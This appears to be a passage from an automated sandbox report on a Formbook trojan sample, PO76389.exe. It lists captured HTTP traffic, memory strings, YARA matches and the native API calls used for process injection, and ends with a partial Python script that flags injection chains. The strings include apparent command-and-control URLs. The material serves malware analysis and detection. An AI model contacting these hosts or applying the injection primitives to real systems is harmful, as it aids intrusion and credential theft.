68 70 5a 4d 52 d6 01 3b da ac 72 82 20 29 35 d2 0e dc 2c 19 9e fe b9 a4 b8 33 fc 24 ba 5e b6 65 e7 a2 9d d8 71 ae 54 1e 87 2e 9d c3 75 e0 0e 5a 19 0e 2f b6 a0 54 13 89 cc 3e 76 ac ab 2c 29 d0 21 f6 af 7a dc 53 d0 b8 ed 15 eb 75 07 83 3c 9c 31 9c 77 7c b8 a1 fc 54 f7 ac bd ca fc 57 88 e8 9a 10 b1 82 34 01 6a 0e 62 4d 18 35 08 01 61 a0 23 59 12 c0 b7 20 84 b6 02 79 a6 a8 d7 6d ab bd fe b8 fe 99 aa ad 20 59 b0 1b 8b ab 54 b4 31 f5 19 9a 4e f5 47 0c 4c 1d 65 88 61 1b 3b 04 c8 23 8d c3 12 22 80 0c e2 0f 1a 9d a3 99 74 0e d3 3d d6 81 40 14 00 ed 41 d8 4f 60 d0 4f 7f 36 6c d1 a9 c4 19 31 d4 6c b9 ad 8b a8 09 c7 a4 ba 0e f6 4b 16 4e d3 f0 a0 a6 a1 31 36 15 8e af d7 34 44 3a 13 7c d5 20 5f e1 2b d6 fe 97 0c 20 2f 22 80 b9 8a 0c c7 dc be 25 09 58 a4 ae c2
7e 7b 46 4f 55 1b ef 37 b4 cd c9 89 a6 d2 56 49 40 5a 07 9c 81 d1 54 0b 09 fa be 3d c3 bb 5c 4e af 6f 63 8a ac 8e c1 8c 54 03 f4 c7 ce bc 27 62 49 df ea 35 4e 90 0c 9d 38 af ad 75 56 b9 86 24 77 d6 41 04 29 c4 25 38 9d 04 ba a4 54 81 bd 39 02 29 a4 20 12 e9 52 50 91 d1 1a a1 31 34 09 6a 6b a0 41 9a 75 95 e3 e1 15 fa db 9a a5 c5 29 de cd 8e 5b 83 35 a8 47 db 3c 54 4d 64 09 a5 8a ac e1 dd 09 87 97 ec 5c d7 81 91 ba 3e 35 9a 5a 3a 3b 1b 50 d7 b9 1a 9c 36 f5 13 01 60 a0 7c 4b 50 11 04 c1 76 26 06 f1 87 05 0a 1a f7 d8 51 4b b0 0f d2 a6 11 4d 1a 5f 9f 3b 91 d0 21 c3 2a 1e 4e b8 77 06 a1 46 07 9a 4e 69 6f 1a 93 96 31 b0 88 c1 2a b9 d4 fd f2 fe e3 07 9f 3c f9 b7 1f 3c f9 e2 ed a5 29 d6 71 a9 6b 1e 09 63 8a 26 4e c4 11 05 50 39 6c 22 1a 27 4b 35 62 22 3c 1c 0d 3c f4 18 fa 47 d5 76 a1 ed 09 6c 37 7f 33 bc 7a cc 81 26 f5 69 0d 45 a1 50 e8 2a d3 d2 89 b6 78 e8 98 94 da ba ea 5d cf ba 66 84 c4 10 fd b1 0f 4f 8e f6 20 40 5d 1f 29 75 61 fb c5 70 c2 53 af e0 02 90 7c 25 23 7a cc ca 1e 04 49 57 65 8e 18 a5 a4 98 1e 53 91 11 5f 1f 9b 70 32 db
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:16 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Data Ascii (decoded from the captured hex; the body opens with the chunk-size line "2000", i.e. an 8192-byte first chunk, and the capture stops partway into it):
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>系统发生错误</title>
    <meta name="robots" content="noindex,nofollow" />
    <style>
        /* Base */
        body {
            color: #333;
            font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif;
            margin: 0;
            padding: 0 20px 20px;
        }
        h1{
            margin: 10px 0 0;
            font-size: 28px;
            font-weight: 500;
            line-height: 32px;
        }
        h2{
            color: #4288ce;
            font-weight: 400;
            padding: 6px 0;
            margin: 6px 0 0;
            font-size: 18px;
            border-bottom: 1px solid #eee;
        }
        h3{
            margin: 12px;
            font-size: 16px;
            font-weight: bold;
        }
        abbr{
            cursor: help;
            text-decoration: underli
(The page title is Chinese and reads "A system error occurred" in English.)
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Mon, 16 Sep 2024 07:41:01 GMT | Connection: close | Content-Length: 4948 | Data Raw: [hex dump of response body omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Mon, 16 Sep 2024 07:41:04 GMT | Connection: close | Content-Length: 4948 | Data Raw: [hex dump of response body omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Mon, 16 Sep 2024 07:41:06 GMT | Connection: close | Content-Length: 4948 | Data Raw: [hex dump of response body omitted]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Mon, 16 Sep 2024 07:41:09 GMT | Connection: close | Content-Length: 5108 | Data Raw: [hex dump of response body omitted]
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.fimgroup.net
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.fimgroup.net/f3w9/
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004DDE000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000491E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000478C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thinkphp.cn
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033z:
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000297F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.2774641908.00000000075C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000004472000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.0000000003FB2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000005.00000002.4571457721.0000000003C98000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00507099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00507099
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00507294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00507294
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_004F4342
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0051F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0051F5D0

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_004B29C2
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005202AA NtdllDialogWndProc_W,0_2_005202AA
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051E769 NtdllDialogWndProc_W,CallWindowProcW,0_2_0051E769
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EA4E NtdllDialogWndProc_W,0_2_0051EA4E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0051EAA6
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAC99 NtdllDialogWndProc_W,0_2_004CAC99
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0051ECBC
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAD5C NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,0_2_004CAD5C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAFB4 GetParent,NtdllDialogWndProc_W,0_2_004CAFB4
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0051EFA8
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F0A1 SendMessageW,NtdllDialogWndProc_W,0_2_0051F0A1
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0051F122
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F37C NtdllDialogWndProc_W,0_2_0051F37C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F3DA NtdllDialogWndProc_W,0_2_0051F3DA
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F3AB NtdllDialogWndProc_W,0_2_0051F3AB
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F45A ClientToScreen,NtdllDialogWndProc_W,0_2_0051F45A
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F425 NtdllDialogWndProc_W,0_2_0051F425
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0051F5D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F594 GetWindowLongW,NtdllDialogWndProc_W,0_2_0051F594
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CB7F2 NtdllDialogWndProc_W,0_2_004CB7F2
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CB845 NtdllDialogWndProc_W,0_2_004CB845
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FE80 NtdllDialogWndProc_W,0_2_0051FE80
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,0_2_0051FF04
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_0051FF91
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0254C4F3 NtClose,2_2_0254C4F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,2_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B60 NtClose,LdrInitializeThunk,2_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174340 NtSetContextThread,2_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173010 NtOpenDirectoryObject,2_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173090 NtSetValueKey,2_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174650 NtSuspendThread,2_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B80 NtQueryInformationFile,2_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BA0 NtEnumerateValueKey,2_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BF0 NtAllocateVirtualMemory,2_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BE0 NtQueryValueKey,2_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AB0 NtWaitForSingleObject,2_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AD0 NtReadFile,2_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AF0 NtWriteFile,2_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031739B0 NtGetContextThread,2_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F30 NtCreateSection,2_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F60 NtCreateProcessEx,2_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F90 NtProtectVirtualMemory,2_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FB0 NtResumeThread,2_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FA0 NtQuerySection,2_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FE0 NtCreateFile,2_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E30 NtWriteVirtualMemory,2_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E80 NtReadVirtualMemory,2_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EA0 NtAdjustPrivilegesToken,2_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EE0 NtQueueApcThread,2_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D10 NtMapViewOfSection,2_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D10 NtOpenProcessToken,2_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D00 NtSetInformationFile,2_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D30 NtUnmapViewOfSection,2_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D70 NtOpenThread,2_2_03173D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DB0 NtEnumerateKey,2_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DD0 NtDelayExecution,2_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C60 NtCreateKey,2_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CA0 NtQueryInformationToken,2_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CC0 NtQueryVirtualMemory,2_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD3090 NtSetValueKey
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD3D70 NtOpenThread
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02FD3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00628B30 NtCreateFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00628CA0 NtReadFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00628D90 NtDeleteFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00628E40 NtClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00628FB0 NtAllocateVirtualMemory
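The rows above list, per function address, the native (Nt*) calls Joe Sandbox resolved in svchost.exe and in the dropped netbtugc.exe. What a responder wants from such a list is not the raw rows but whether one process holds every primitive of a process-injection chain (open a target, allocate or map memory in it, write to it, run code in it). The script below is an added example, not Joe Sandbox's code and not part of this report: it parses rows in the report's own format, groups each process's native calls into injection stages, and flags processes that hold a complete chain. The stage sets and the chain rule are this example's own heuristic; the sample rows are a constructed subset copied from this report's listing, and LdrInitializeThunk, which the report lists next to many of the stubs, is counted but not interpreted.

```python
import re
from collections import defaultdict

# Sample input: "Code function" rows copied from this report (a constructed subset of
# the listing). The parser accepts the raw joined form "exeCode function:" as well as
# a separated "exe | Code function:" form and skips rows of any other kind.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD4340 NtSetContextThread,LdrInitializeThunk,5_2_02FD4340",
    r"Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02FD2BF0",
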